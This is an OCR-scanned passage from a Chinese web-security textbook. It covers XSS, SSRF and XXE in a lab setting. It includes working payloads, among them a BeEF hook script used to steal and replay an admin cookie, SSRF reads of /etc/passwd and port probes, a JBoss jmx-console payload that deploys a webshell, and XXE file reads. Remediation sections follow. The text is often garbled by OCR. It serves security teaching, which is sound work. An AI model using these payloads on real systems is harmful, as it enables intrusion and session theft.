应 用 中 常见 的 安全 漏洞 , 它 允 许 用 户 将 恶意 代码 植 人 Web 页 面 , 当 其 他 用 户 访问 此 页 面 
时 , 植 入 的 恶意 代码 就 会 在 其 他 用 户 的 客户 端 中 执行 。 

XSS 漏洞 的 危害 很 多 ,可 以 通过 XSS 漏洞 获取 客户 端 用 户 的 信息 (例如 用 户 登 录 的 
Cookie 信息 ), 可 以 通过 XSS 蠕虫 进行 信息 传播 ,可 以 在 客户 端 中 植 人 木马 ,可 以 结合 其 
他 漏洞 攻击 服务 器 ,在 服务 器 中 植 人 木马 等 。 


7.9 XSS 漏洞 分 类 


XSS 漏洞 分 为 反射 型 KSS 漏洞 .存储 型 XSS 漏洞 和 DOM 99 XSS 漏洞 3 类 。 


1. 反射 型 XSS 漏洞 
利用 反射 型 XSS 漏洞 植 和 人 的 恶意 代码 不 会 存储 在 服务 器 端 ,一 般 容 易 出 现在 搜索 页 
面 ,需要 构造 植 人 恶意 代码 的 Web 页 面 ,诱骗 受害 者 访问 该 页 面 , 才 能 触发 攻击 。 


2. 存储 型 XSS 漏洞 

利用 存储 型 XSS 的 恶意 代码 存储 在 服务 器 中 ,一 般 植 人 留言 板 ` 个 人 信息 文章 发 表 
等 功能 的 页 面 中 。 如 果 页 面 对 用 户 输 入 的 数据 过 滤 不 严格 ,恶意 用 户 会 将 恶意 代码 存储 
到 服务 器 中 。 这 种 类 型 的 XSS 漏洞 危害 非常 严重 ,因为 恶意 代码 会 存储 到 服务 器 中 , 客 
户 端 每 次 访问 服务 器 都 会 触发 恶意 代码 。 


3. DOM 型 XSS 漏洞 
DOM 型 XSS 漏洞 是 基于 文档 对 象 模 型 (Document Object Model) fj — ff XSS 漏洞 。 


HB 反射 型 XSS 


反射 型 XSS 示例 代码 如 下 : 
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输入 以 下 测试 语句 : 


图 7-1 输入 name=ctfs 的 返回 结果 


输入 以 下 测试 语句 : 


会 执行 植 人 的 KSS 恶意 代码 ,触发 弹 窗 , 这 就 是 典型 的 反射 型 KSS 漏洞 的 利用 ,如 图 7-2 所 示 。 


图 7-2 反射 型 XSS 漏洞 的 利用 效果 


mum 204 mm 


m 7 7: XSS WU) um 
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存储 型 XSS 示例 代码 如 下 : 


上 述 代码 会 将 GET 型 的 name 值 存储 到 xss 表 中 ,然后 查询 xss 表 中 的 数据 并 进行 
ER. WF name 值 没有 经 过 过 滤 ,就 可 能 将 恶意 代码 插入 到 xss 表 中 ,在 数据 展示 的 过 
程 中 执行 恶意 代码 。 

正常 提交 ctfs 时 ,会 显示 正常 name 值 为 ctfs, 如 图 7-3 所 示 。 

4 88 AE <script> alert(/ ctfs/ ) — /script? BF , 4f — script> alertC/ctfs/) </script> 
存储 到 xss 表 中 ,如 图 7-4 所 示 。 再 次 访问 页 面 时 会 执行 此 代码 ,触发 弹 窗 ,如 图 7-5 
DES 
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CTFS-WIKI 


此 网 站 中 集合 了 SQL 注入 、 文 件 他 含 、 命 令 涩 行 、 反 序列 化 、SSRF、 文 件 上 传 等 害 见 的 web 澳 酒 环境 
Follow Qictts-wii 


存储 型 XSS 


nes prg mamescits 


7-3 正常 提交 ctfs 的 结果 


CTFS-WIKI 


此 网 站 中 集合 了 SQL 注 入 、 文 件 包 合 、 命 令 执行 、 反 序列 化 、SSRF、 文 件 上 传 等 常见 的 web 源 洞 环境 
Follow @ctts-wiki 


存储 型 XSS 


index php?name-ctfs. 


name: <scrppalercts)vscrpt | sii] 


图 7-4 R36 — script alertC/ctfs/) — /scriptz- f] #% 4 


图 7-5 存储 型 XSS 漏洞 的 利用 效果 


m 0$ 7 £ XSS 漏洞 mm 
_ 7.5 DOM 型 XSS 


7.5.1 DOM 简介 


DOM 是 W3C 组 织 推荐 的 处 理 可 扩展 标记 语言 的 标准 编程 接口 ,可 以 使 程序 和 脚本 
能 够 动态 访问 和 更 新 文档 的 内 容 、 结 构 以 及 样式 。DOM 示例 如 图 7-6 所 示 。 


文档 
根 元 素 : 
«html» 
1 
元 素 EH 
«head» «body» 
TR: 属性 : m| TR: TR: 
<title> href <a> «hi» 
文本 : A: 文本 : 
“文档 标题 “我 的 链接 “我 的 标题 ” 


图 7-6 DOM 示例 


7.5.2 DOM 型 XSS 示例 代码 分 析 
DOM 型 XSS 示例 代码 如 下 : 


«script» 
function domxss () 
t 
varstr -document.getElementById("input").value; 
document.getElementById ("output").innerHTML-str; 
H 
</script> 


<h2 id="output"></h2> 
<input type="text" id="input" value=""/> 
<input type="button" value="submit" onclick="domxss ()"/> 


代码 中 存在 domxss 函数 ,此 函数 通过 DOM 操作 将 input 节点 的 值 作为 变量 赋予 
output 节点 。 

当 输 入 ctfs 时 ,通过 domxss 函数 ,会 将 output 节点 赋值 为 ctfs, 页 面 显 示 ctfs, 如 
图 7-7 所 示 。 

当 输 入 二 img src=1 onerror- alert (/ctfs/) /7 B) ,38 EF domxss 函数 ,会 将 output 节 
点 赋值 为 二 img src— 1 onerror 一 alert(/ctfs/)/ 盖 ,页 面 会 由 于 执行 错误 而 触发 弹 窗 ,如 
图 7-8 所 示 。 
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CTFS-WIKI 
此 网 站 中 集合 了 SQL 注 入 、 文 件 包含 、 命 令 执行 、 反 序列 化 、SSRF、 文 件 上 传 等 弟 见 的 web 汤 油 环 境 
Follow @ctfs-wiki 

DOM XSS 

RAP 

ctfs 

I submit 

ecrrs-wa 


7-7 输入 ctfs 的 返回 结果 


7-8 输入 一 img src—1 onerror— alert(/ctís/) /7 fj iZ [n] £5 5- 


_ 二 xss 漏洞 利用 


1. BeEF 简介 
BeEF( Browser Exploitation Framework) 是 浏览 器 攻击 框架 的 简称 ,是 一 款 专 注 于 
浏览 器 的 渗透 测试 工具 。 它 可 以 利用 XSS 漏洞 展开 攻击 ,加 载 浏 
览 器 ,劫持 会 话 。 它 还 扩展 了 路 站 漏洞 的 利用 ,能 通过 Hook 技术 
支持 浏览 器 ,并 且 可 以 执行 很 多 内 嵌 命 令 。BeEF 的 标识 如 图 7-9 - 
Bm. zeEF 


以 下 是 BeEF 的 基本 情况 : 7-9 BeEF 的 标识 


mum 208 mum 
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BeEF 安装 目录 : /usr/share/beef-xss。 

默认 管理 页 面 URL: http: //IP: 3000/ui/panel, 上 默认 用 户 名 和 密码 都 是 beef. 
。 Hook 脚本 URL: http: //IP: 3000/ Hook. js。 

* Hook: <script src= "http: //IP: 3000/Hook. js" —— /script— 

。 默认 测试 页 面 : http: //IP: 3000/demos/ butcher/index. html, 


2. XSS 漏洞 利用 示例 
在 Kali Linux 中 启动 BeEF, BeEF 在 启动 后 会 开启 Web 服务 ,如 图 7-10 所 示 。 


rootGkali:/usr/share/beef-xss& ./beef 
[ 9:27:40][*] Bind socket [imapeudoral] listening on [0.0.0.0:2000]. 
[ 9:27:40][*] Browser Exploitation Framework (BeEF) 0.4.7.0-alpha 
9:27:40] l Twit: @beefproject 


|o Wiki: 
Project Creator; Wade Alcorn (@WadeAlcorn) 
BeEF is loading. Wait a few seconds... 

12 extensions enabled. 

254 modules enabled. 

2 network interfaces were detected. 

running on network interface: 127.0.0.1 

l Hook URL: i T. j 
|. UI URL: http://127.0.0.1:3000/ui/panel 
running on network interface: 192.168.91.135 


l Hook URL: http://192.168.91.135:3000/hook.js 


| UI URL:  http://192.169.21.135:3000/ui/panel 
RESTful API key: cf79fdelfaae0443963985b88272f£626c50d88f52 
HTTP Proxy: 2 i 


BeEF server started (press controlic to stop) 


图 7-10 启动 BeEF 


通过 BeEF 开启 的 Web 服务 进入 BeEF 的 管理 页 面 进行 操作 。BeEF 默认 的 管理 页 
HÆ http: //ip: 3000/ui/panel, 默 认 用 户 名 与 密码 都 是 beef, 如 图 7-11 所 示 。 


=eEF 


Authentication 
Username: beef 
Password: p 


| 一 Loon | 


7-11 登录 BeEF 管理 页 面 


然后 将 Hook 脚本 植 人 到 目标 网 站 中 。 这 里 以 存在 存储 型 XSS 漏洞 的 网 站 为 例 进 
行 演示 。 
目标 网 站 留言 板 存在 存储 型 KSS 漏洞 。 将 以 下 代码 插入 到 网 站 中 ,如 图 7-12 所 示 。 


«script src-"http://192.168.91.135:3000/Hook.js"»«/script»Hook JS 
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管理 员 在 网 站 后 台 进 行 留言 审核 时 ,就 会 自动 触发 Hook 脚本 ,使 网 站 遭受 攻击 ,如 
图 7-13 所 示 。 


7-12 将 Hook 脚本 植 入 到 服务 器 中 


7189-10 134602 (WF: admin ,欢迎 使 用 CMS 网站 主页 MRNA LUN 


2018-10-10 134538 QQ: Emal: !P:19216891.1 xmü EE NM 


2017-07-27 113340 QQ: Email: IP: 19216881.1 amu ER NM 


图 7-13 管理 员 在 网 站 后 台 进 行 留言 审核 


登录 BeEF 的 管理 页 面 ,发 现 已 经 成 功 获 取 被 攻击 网 站 的 Cookie 信息 ,如 图 7-14 
所 示 。 


WeBRTC Ves 
Activex No 


Session Cookies: Yes 
Persistent Cookies: Yos 


| Category: Hooked Page (5 Items) 

Page Tite: 文章 至 

Page URI hil//192.10891.105.0000/cmswcmsredmi/message php 
Page Referrer: http:/192 168.91.108-9000/cma/wema/admn/menu php 
Host Named: 102 168 91 108 

Cookies: usemame=admim: userid-1: PHPSESSID-4009505d6424fd33ac5ee3a2cctf3ef6; BEEFHOOK=H3I2xliPv2E3SEUFbwZIrto7l5nKWmdb1d86sRyNURO63IHaONsaIAbro0CYI41KXCWOAWaAEBPGO9m 
| Category: Host (8 Ttemis] 

Host NamelP- 192.163.911 

Date: Wed Oct 10 2018 13:50:04 GMT«0800. 

Operating System: Wndows 

Hardware: Unknown 


图 7-14 获取 被 攻击 网 站 的 Cookie 信息 
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通过 Burp Suite 进行 截 包 , 然 后 将 Cookie 修改 为 BeEF 获取 的 Cookie 信息 ,如 图 7-15 
所 示 。 


GET 7cns/wcms/admin/message. php HTTP7T 1 
Host: 192.168. 91. 108:8000 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 
Accept: text/html, application/xhtml-*xml, application/xml;q-0. 9, */*; q=0. 8 
Accept-Language: zh-CN, zh; q70. 8, en-US; q70. 5, en; q=0. 3 

ing:—geip, deflate 
Cookie: username-admin; userid-1; PHPSESSID-4009505d64a4fd33ac5ee3a2cc1f3ef6; 
Connection: keep-alive 
Upgrade-Insecure-Requests: 1 


7-15” 截 包 后 修改 Cookie 


利用 修改 后 的 Cookie 访问 网 站 后 台 ,发 现 可 以 成 功 登录 ,如 图 7-16 所 示 。 


2018-10-10 13:57:47 QQ: Email: IP:192.16891.1 


2017-07-27 11:33:40 QQ: Email: IP: 192.168.91.1 


B 7-16 利用 修改 后 的 Cookie 成 功 登录 网 站 后 台 


77 ”XSS 漏洞 修复 


XSS 漏洞 修复 的 主要 方法 是 对 用 户 的 输入 和 输出 进行 过 滤 , 常 见 的 过 滤 函 数 有 
htmlentities 和 htmlspecialchars, 


htmlspecialchars 函数 会 将 预定 义 的 特殊 字符 转换 为 HTML 实体 ,如 图 7-17 所 示 。 


&(& 符号 ) &amp; 


"( 双 引号 ) — &quot; ,除非 设置 了 MT NoquoTES | E - i | 
“( 单 引号 ) 。 设置 了 ENT_quoTES 后 &#039; (如 时 是 ENT_HTML401) ， 或 者 &apos; (如 时 是 ENT_XML1、 ENT XHTML 或 ENT_HTML5). | 
«(NF) — &lt 
> (大 于 ) &gt; 


图 7-17 htmlspecialchars 将 预定 义 特 殊 字 符 转 换 为 HTML 实体 


如 果 在 7. 3 节 的 反射 型 XSS 示例 代码 中 加 入 htmlspecialchars 函数 ,就 可 以 修复 
XSS 漏洞 。 


<? php 
if(isset($ GET['name']))( 
$name-$ GET['name']; 
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echo "<h2>"."Hello ".htmlspecialchars ($name)."«h2»"; 
}else{ 
exit (); 


) 


WI 


输入 以 下 payload: 


http://www.ctfs-wiki.com/index.php?name-«script»alert('ctfs')«/script» 


发 现 输出 了 Hello —script-alertCctfs') </script> , Z fih Az AA , An E 7-18 所 示 。 


CTFS-WIKI 
It ibERTSQUIA. KABA, SSRF. REP. SSRF. XfEERIEREDISwebaE WIR 


Follow @ctts-wiki 


反射 性 XSS 


Andex pnprnanercm 


Hello «script»alert('ctfs')«/script» 


crrs wie 


图 7-18 htmlspecialchars 函数 过 滤 后 的 效果 


查看 源 代码 ,发 现 htmlspecialchars 函数 已 经 将 特殊 字符 二 和 二 转 义 为 实体 编码 
Dlt H &gt; ,这 样 就 无 法 执行 恶意 脚本 ,如 图 7-19 所 示 。 


<table class=' table table-striped 


《h2>Hello &it:scriptést alert ( ctfs' )&lt;/script&et; Ch2>C/table. 
footer: 
p?&copy; CIFS-WIKI </p> 
footer? 


“div> 


图 7-19 将 特殊 字符 二 和 二 转 义 为 实体 编码 的 效果 


7.8 ”思考 题 


. 什么 是 XSS 漏洞 ? 它 有 哪些 危害 ? 
. XSS 漏洞 有 哪 几 种 类 型 ? 
什么 是 反射 型 XSS 漏洞 ? 

. 什么 是 存储 型 XSS 漏洞 ? 

. 什么 是 DOM 型 XSS 漏洞 ? 

. 简 述 BeEF 的 原理 。 

. XSS 漏洞 的 修复 方法 有 哪些 ? 


a 0 0c» OD- 
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8.1  SSRF 漏洞 简介 


SSRF 意 为 服务 端 请 求 伪 造 (Server-Side Request Forge) 。 攻 击 者 利用 SSRF 漏洞 通 
过 服务 器 发 起 伪造 请 求 , 这 样 就 可 以 访问 内 网 的 数据 ,进行 内 网 信息 探测 或 者 内 网 漏洞 
利用 。 

SSRF 漏洞 形成 的 原因 是 : 应 用 程序 存在 可 以 从 其 他 服务 器 获取 数据 的 功能 ,但 是 对 
服务 器 的 地 址 并 没有 做 严格 的 过 滤 , 导 致 应 用 程序 可 以 访问 任意 的 URL 链接 。 攻 击 者 
通过 精心 构造 URL 链接 ,可 以 利用 SSRF 漏洞 进行 以 下 攻击 : 

(1) 通过 服务 器 获取 内 网 主机 、 端 口 和 banner 信息 。 

(2) 对 内 网 的 应 用 程序 进行 攻击 ,例如 Redis, JBoss 等 。 

(3) 利用 file: // 擅 协议 读 取 文 件 。 

(4) 可 以 攻击 内 网 程序 ,造成 缓冲 区 溢出 。 


8.2 SSRF 漏洞 示例 代码 分 析 


SSRF 漏洞 示例 代码 如 下 : 


<? php 

if (isset($ GET['url1'])) { 
$link-$ GET['url']; 
$filename-'./curled/'.rand().'txt'; 
$curlobj-curl init($link); 
$fp=fopen ($filename, "w"); 
curl setopt ($curlobj, CURLOPT FILE, $fp); 
curl setopt ($curlobj, CURLOPT HEADER, 0); 
curl exec ($curlobj); 
curl close($curlobj); 
fclose ($fp); 
$fp=fopen ($filename, "r"); 
$result=fread ($fp, filesize ($filename)); 
fclose ($fp); 
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echo $result; 
) 
7> 


以 上 代码 通过 curl. exec 函数 对 访问 传人 的 URL 数据 进行 请 求 ,并 返回 请 求 的 
结果 。 

正常 情况 下 , url 参数 传人 http://127. 0. 0. 1/ssrf/1. txt, curl. exec 函数 会 访问 
http://127.0.0.1/ssrf/1.txt, 显 示 “SSRF 服务 端 请 求 伪 造 测试 "信息 ,如 图 8-1 所 示 。 
但 是 如 果 传 人 的 url 参数 没有 经 过 过 滤 ,就 可 能 会 造成 SSRF。 


| 192.16891.142/ssrt/01 php?uri=http/12700.1/ssrt/1-ba 


| kert42 


k 
CTFS-WIKI 


此 网 站 中 集合 了 SQL 注入 、 文 件 包含 、 命 
Follow @ctfs-wiki 


SSRF 服 务 端 请 求 伪造 
index php?uri-http.//x x x x 


SSRFIESHNGRCRUSISUNGE 


OCTFS-WK 


图 8-1 正常 URL 请 求 的 返回 效果 


8.2.1 端口 探测 


url 参数 没有 经 过 严格 过 滤 ,因此 攻击 者 就 可 以 构造 任意 的 URL 以 利用 SSRF 漏洞 。 
例如 ,可 以 通过 http://127. 0.0.1: 3306 来 探测 此 服务 器 是 否 开启 3306 端口 。 
输入 以 下 测试 语句 : 


http://192.168.91.142/ssrf/01.php?url=http://127.0.0.1:3306 


发 现 返 回 数据 库 的 版 本 信息 ,就 说 明 开 启 了 3306 端口 ,如 图 8-2 所 示 。 
输入 以 下 测试 语句 : 


http://192.168.91.142/ssrf/01.php? url=http://127.0.0.1:3308 
车 没有 数据 返回 或 者 返回 时 间 延 迟 较 大 ,就 说 明 3308 端口 没有 开放 ,如 图 8-3 所 示 。 


822 读 取 文件 


通过 file:// 伪 协议 尝试 读 取 常 见 的 文件 ,例如 /etc/passwd 文件 。 
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| € © 19216891.142/s«ri/01.php?uri -http://127.0.0.1:3306 "wc $ é aer # m 4 
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Follow @ctfs-wiki 
SSRF 服 务 端 请 求 伪造 
dex pnpzur=http 


5.1 73<rqa4z 19 OW.D.G6V12DA® Got packets out or orcer 


OCTFS-WII 


图 8-2 利用 SSRF 漏洞 探测 3306 端口 是 否 开启 


局 caduRL 
ti 


$ spitum 


p92 00 911420 ON oh Puichpi/1570013308 | 


[L] Enable Post data [] Enable Referrer 
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此 网 站 中 集合 了 SQL 注 入 、 文 件 包 含 、 命 令 执行 、XXE、 反 序列 化 . SSRF、XSS. 文 
件 上 传 等 常见 的 web 漏 润 环境 


Follow @ctfs-wiki 


SSRF 服 务 端 请 求 伪造 


index php?uri-http-inx x x 


图 8-3 利用 SSRF 漏洞 探测 3308 端口 是 否 开启 
输入 以 下 测试 语句 : 


http://192.168.91.142/ssrf/01.php?url=file:///etc/passwd 


返回 /etc/passwd 文件 的 内 容 , 如 图 8-4 所 示 。 


8.23 内 网 应 用 攻击 


通过 SSRF 漏洞 可 以 进行 端口 信息 探测 ,也 可 以 对 内 网 存在 远程 命令 执行 漏洞 的 应 
用 进行 攻击 。 

1. 信息 探测 

利用 SSRF 端口 信息 探测 的 方法 ,通过 内 网 扫描 发 现 内 网 的 一 台 主 机 开启 了 JBoss 
服务 ,如 图 8-5 所 示 。 
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E D 192.16891.142/ssrt/01 pnp'urt-fiie//etc/pe: 
le 


docker142 


E 
CTFS-WIKI 


ERA $E T SQLIE À. LHA. MORT. SEAMC SSRF. LHES SED webifa INS 


Follow @ctfs-wiki 


SSRF 服 务 端 请 求 伪造 


inder php?url=http /x x x 


rootx 0 0 root /root bbash bin x 1 + bin fin shinnalngin daemon x 2-2 daemon /sbin /shininoiogin adm x 3-4:acm arladm sbin/nologin. 
Ip-r 4-7 Ip-Warispoolipd-/bin/nologin sync x 5 sync-/sbin /bin/sync shutdour:x 6:0 shutdown /sbin:/sbinishutdown hat 7 C^halt/binisbin hat 
maitx 8 42 mail varispooUmal-isbininologin uucp 10:14 uuep;/arispool/uucp:sbir/nclogin operator x 11 0 cperator /root bin/nologin 

games rc12.100 games /usrgames /sbininologin gopher-r3:30:gopher varlgopner /sbin/nologin fp r 14:0: FTP User NarMp:fsbininoiogin 
nobody x 69 90 Nobody / /sbin/nologin vesax 60-60 virtual console memory owner /dev /sbin/nologin sastautn x 499 76:Sastauthd user varlempty 
/sasiauih bin/nologin apache:t 48:48: Apache arm sbin/noiogin mysqlx27 27 MySQL. Server varlibimysqt /binibash sshd'x 74:74 Privilsge- 
separated SSH varemplyisshe /sbin/nologin walci-500:500- home walk /binibash 


O CTFS-WKI 
图 8-4 通过 file: // 伪 协议 读 取 文 件 的 效果 
192.168.91.142/ss11/01 php?uri=http//192.168.91.108:8080 
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此 网 站 中 集合 了 SQL 注入 、 文 件 包 合 、 命 令 执行 、 反 


Follow (ctfs-wiki 


SSRF 服 务 端 请 求 伪造 


index php?urt-httg 


JBoss Online Resources 


mentaton 


e JB 


JBoss Fon 


JBoss Management 


图 8-5 利用 SSRF 漏洞 探测 内 网 JBoss 是 否 开启 
2. 访问 jmx 控制 台 
尝试 访问 JBoss 的 jmx 控制 台 , 输 入 以 下 测试 语句 : 


http://192.168.91.142/ssrf/01.php?url=http://192.168.91.108:8080/jmx- 
console/ 


216 


第 8 章 SSRF 漏洞 


发 现存 在 jmx 控制 台 未 授权 访问 漏洞 ,那么 就 可 以 通过 jboss. deployment 接口 部 署 Web 
木马 应 用 ,如 图 8-6 所 示 。 


192.168.91.142/ssrf/01.php?url=http//192.168.91.108:8080/jmx-console/ 


cker142 


JMX Agent View 
JBoss 
b test-b9edf20207 (127.0.0.1) - default 
ObjectName Filter (e g "jboss "service=inyoker) | Ap| 
Catalina 


JMImplementation 


aut, 'erRepository 


° module-boj 


jboss 


° database 


8-6 ”探测 jmx 控制 台 未 授权 访问 漏洞 


3. 部 署 木马 

通过 jboss. deployment 接口 部 署 Web 木马 应 用 ,通过 本 地 搭建 的 测试 环境 抓 包 , 构 
造 payload, 然 后 通过 SSRF 发 送 payload, 攻 击 内 网 应 用 。 

最 终 获 得 的 payload 为 

http$ 3A$ 2f% 2f192. 168. 91. 108$ 3A8080% 2fjmx - console$ 2fHtmlAdaptor$ 

3Faction$3DinvokeOp$26name$ 3Djboss.deployment$ 3Atype$ 3DDeploymentScanner 


$2Cflavor 
$ 3DURL$ 26methodIndex$3D7$26arg0$3Dhttp$3A$2f2$2f10.2.7.11$2fcmd.war 


4. 获得 Webshell 
利用 SSRF 漏洞 发 起 payload 攻击 ,发 现 已 经 成 功 获 得 Webshell, 如 图 8-7 所 示 , 
5. 执行 命令 
利用 上 传 的 木马 文件 ,可 以 正常 执行 命令 ,如 图 8-8 所 示 。 
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SSRF 服 务 端 请 求 伪造 


index php?urt-http://x x x x 


54 MX MBean Operation Result „ao 


Back to Agent View Back to MBean View — Reinvoke MBean Operation 


Operation completed successfully without a retum value 
D CTFS-WIKI 


图 8-7 利用 SSRF 漏洞 攻击 内 网 应 用 获得 Webshell 


htip//192.168.91.142/ssrt/01.pnpTurl=http/192.16891108:8080/cmd/cmajsp?cmd=whosmi 


[ Enable Post data [C] Enable Referrer 
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Follow @ctfs-wiki 


SSRF 服 务 端 请 求 伪造 


index php?uri-http //x x x x 


Commands with JSP Send 
Command: whoami 


test-b9edf20207\adninistrstor 


@CTFS-WK 


此 网 站 中 集合 了 SQL 注入 、 文 件 包含 、 命 令 执行 、 反 序列 化 、SSRF、 文 件 上 传 等 常见 


图 8-8 通过 Webshell 执行 命令 


8.3 SSRF 漏洞 修复 
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SSRF 漏洞 修复 的 4 种 方法 如 下 : 

CD 过 滤 请 求 协议 ,只 允许 http 或 者 https 开头 的 协议 。 
(2) 严格 限制 访问 的 IP 地址 ,只 允许 访问 特定 IP 地 址 。 
(3) 限制 访问 的 端口 ,只 允许 访问 特定 的 端口 。 

(4) 设置 统一 的 错误 信息 ,防止 造成 信息 泄露 。 


8.4 思考 题 


-3 0 c £ Q r = 


. 什么 是 SSRF 漏洞 ? 

.SSRF 漏洞 有 哪些 危害 ? 

. 简 述 SSRF 漏洞 形成 的 原因 。 

. SSRF 漏洞 的 利用 方法 有 哪 几 种 ? 
. SSRF 漏洞 如 何 进行 信息 探测 ? 

. SSRF 漏洞 如 何 进 行内 网 渗透 ? 

. SSRF 漏洞 的 修复 方法 有 哪些 ? 
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9.1 XXE 漏洞 简介 


XXE(XML External Entity, XML 外 部 实体 注入 ) 漏 洞 产生 的 原因 是 : 应 用 程序 在 
解析 XML 时 没有 过 滤 外 部 实体 的 加 载 ,导致 加 载 了 恶意 的 外 部 文件 ,造成 执行 命令 、 读 
取 文 件 .扫描 内 网 .攻击 内 网 应 用 等 危害 。 


9.2 XML 基础 


XML (eXtensible Markup Language, 可 扩展 标记 语言 ) 用 来 结构 化 、 存 储 以 及 传输 
信息 。 
XML 文档 结构 包括 3 部 分 : XML 声明 文档 类 型 定义 (可 选 ) 和 文档 元 素 。 例 如 : 


<!--XML 声 明 (定义 了 XML 的 版 本 和 编码 ) - -> 
<?xml version-"1.0" encoding- "ISO-8859-1"?» 
<!-- 文 档 类 型 定义 --> 
< !DOCTYPE note [ 
<!ELEMENT note (to, from,heading,body)» 


< !ELEMENT to (#PCDATA) > 
«ELEMENT from (# PCDATA)» 
< !ELEMENT heading (4 PCDATA)» 
< !ELEMENT body (#PCDATA)> 

]> 

<!-- 文 档 元 素 --> 

«note» 

«to»George«/to» 

«from» John«/from» 


Xheading»Reminder«/heading» 
Xbody»Don't forget the meeting!«/body» 
< /note> 


9.2.1 XML 声明 


以 下 是 XML 声明 示例 : 


— $0 € —XXEGÁAG] mam 


«?xml version-"1.0" encoding-"ISO-8859-1"?» 


XML 声明 以 <? 开 头 , 以 ?之 结束 。version 属性 是 必 选 的 , 它 定 义 了 XML 的 版 本 。 
encoding 属性 是 可 选 的 ,定义 了 XML 进行 解码 时 所 用 的 字符 集 。 


9.2.2 文档 类 型 定义 


文档 类 型 定义 (Document Type Definition, DTD) 用 来 约束 一 个 XML 文档 的 书写 
规范 。 


1. 文档 类 型 定义 基础 语法 
对 元 素 进行 定义 的 基础 语法 如 下 : 


< !ELEMENT 元 素 名 类 型 > 


2. 内 部 定义 
将 文档 类 型 定义 直接 放 在 XML 文档 中 , 称 为 内 部 定义 。 内 部 定义 的 格式 如 下 : 


< !DOCTYPE 根 元 素 [元 素 声明 ]> 


示例 如 下 : 


< !DOCTYPE note [ 
< ELEMENT note (to, from,heading,body)» 
< !ELEMENT to (& PCDATA) > 
< !ELEMENT from (# PCDATA)» 
< !ELEMENT heading (4 PCDRTR) > 
< !IELEMENT body (#PCDATA)> 
]» 


DOCTYPE note 定义 此 文档 是 note 类 型 的 文档 。 

ELEMENT note(to ,from,heading,body) 定 义 note 有 4 个 元 素 : to from, heading, 
body, 

ELEMENT to( € PCDATA) Æ X. to 元 素 为 # PCDATA 类 型 。 

ELEMENT from(# 了 PCDATA) 定 义 from 元 素 为 #PCDATA 类 型 。 

ELEMENT heading( # PCDATA) 定 义 heading 元 素 为 # PCDATA 类 型 。 

ELEMENT body( à PCDATA) 定 义 body 元 素 为 #PCDATA 类 型 。 


3. 外 部 文档 引用 

文档 类 型 定义 的 内 容 也 可 以 保存 为 单独 的 DTD 文档 。 
1) DTD 文 档 在 本 地 

引用 本 地 DTD 文档 的 格式 如 下 : 


< !DOCTYPE 根 元 素 SYSTEM "文件 名 "> 


示例 如 下 : 
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2) DTD 文档 在 公共 网 络 上 
引用 公共 网 络 上 的 DTD 文档 的 格式 如 下 : 


<!DOCTYPE 根 元 素 PUBLIC "DTD 名 称 " "DTD 文档 的 URL"> 


示例 如 下 : 


E 93 XML 漏洞 利用 


XML 漏洞 利用 示例 代码 如 下 : 


在 以 上 代码 中 ,file_get_contents 函数 读 取 了 php://input 传人 的 数据 ,但 是 传人 的 
数据 没有 经 过 任何 过 滤 , 直接 在 loadXML 函数 中 进行 了 调用 并 通过 echo 函数 输出 
$ username 的 结果 ,这 样 就 导致 了 XXE 漏洞 的 产生 。 


9.3.1 文件 读 取 


通过 加 载 外 部 实体 ,利用 file://、php:// 等 伪 协 议 读 取 本 地 文件 。 
file: // 伪 协议 payload 如 下 : 


— 222 = 


$93 XXE 漏洞 


通过 POST 方法 提交 payload , 读 取 /etc/passwd 文件 的 内 容 , 如 图 9-1 所 示 。 


局 Lead URL [|http/192.168.91142/xxe/ 
Ü SputuURL 


Execute 


回 Enable Post data [] Enable Referrer 


Post data «?xml version="1.0' ?> 
«IDOCTVPE creds [ 
«IELEMENT usernarse ANY > 
«IELEMENT password ANY > 


input xml 


hello rootx-0:0:root;/root/bin/bash bin:x-1:1:bin:/bin:/sbin/nologn daemon: 2-2: daemon:/sbin;/sbin/nologin adm:x:3:4:adm:/var/adm /sbin/nologin 
1px4:7 Ip:vat/spool/Ipd:;sbin/nologin sync:x 5:0:sync /sbin:/bin/sync shutdown :x-6:0:shutdown:/sbin:/sbin/shutdown halt-x.7-0:halt/sbin:/sbin/halt 
mailx-8:12-mall.var/spool/mall/sbin/nologin uucp:x-10:14:uucp;lvar/spool/uucp;/sbin/nologin operatorx-11:0:operator-/root./sbin/nologin 
games:-12-100:games-/usr/games:/sbin/nologin gopher-x-13:30:gopher-/var/gopher-/sbin/nologin fip-x 14:50:FTP User-/var/ftp:/sbin/nologin 
nobody:x:99:99:Nobody.//sbin/nologin vcsa:x 69:69:virtual console memory owner-/dev-/sbin/nologin saslauthx-499.76:Saslauthd user.Jvarempty 
/saslauth:/sbin/nologin apache:x:48:48:Apache:/varwww /sbin/nologin mysqx 27-27:MySQL Server.ivar/lib/mysqt./bin/bash sshd:x 74:74:Priviege- 
separated SSH./varemply/sshd:/sbin/nologin walk-x-500:500:-/home/walk /bin/bash 
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9-1 利用 file:// 伪 协议 读 取 文 件 内 容 


但 是 利用 file:// 伪 协议 无 法 读 取 PHP 文件 的 内 容 , 因 为 读 取 的 内 容 会 被 解析 执行 ， 
看 不 到 源码 。 可 以 利用 php:// 伪 协议 对 文件 内 容 进 行 Base64 编码 ,这 样 就 可 以 读 到 
Base64 编码 后 的 源码 ,然后 再 通过 Base64 解码 就 获得 了 源码 。 

php:// 伪 协议 payload 如 下 : 


<? xml version-"1.0" ?> 

< !DOCTYPE creds [ 

< !ELEMENT username ANY? 

< !ELEMENT password ANY? 

«!ENTITY xxe SYSTEM "php://filter/read- convert.base64- encode/resource- 
index.php"»]» 

«creds» 

«username» &xxe;«/username» 

«password»test«/password» 

«/creds» 


通过 POST 方法 提交 payload. i£ XN index. php 文件 的 Base64 编码 的 内 容 , 如 图 9-2 
所 示 。 


9.3.2 内 网 探测 


利用 XXE 漏洞 进行 内 网 探测 。 如 果 端 口 开启 ,请 求 返回 的 时 间 会 很 快 ;如 果 端 口 关 
闭 ,请 求 返回 的 时 间 会 很 慢 。 
探测 22 端口 是 否 开启 的 payload 如 下 : 
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Qj LoadURL [http;/192.168.91.142/xe/ 
Q SpituURL 


D Execute 


EZ Enable Post data [] Enable Referrer 


Post data <IELEMENT username ANY > 

<IELEMENT password ANY > 

<!ENTITV se SYSTEM 'phpi//filter/read=convert.base54-encode/resource=index-php" »]» 
<creds> 


Follow @ctfs-wiki 


XXE 


input xml 


hello 
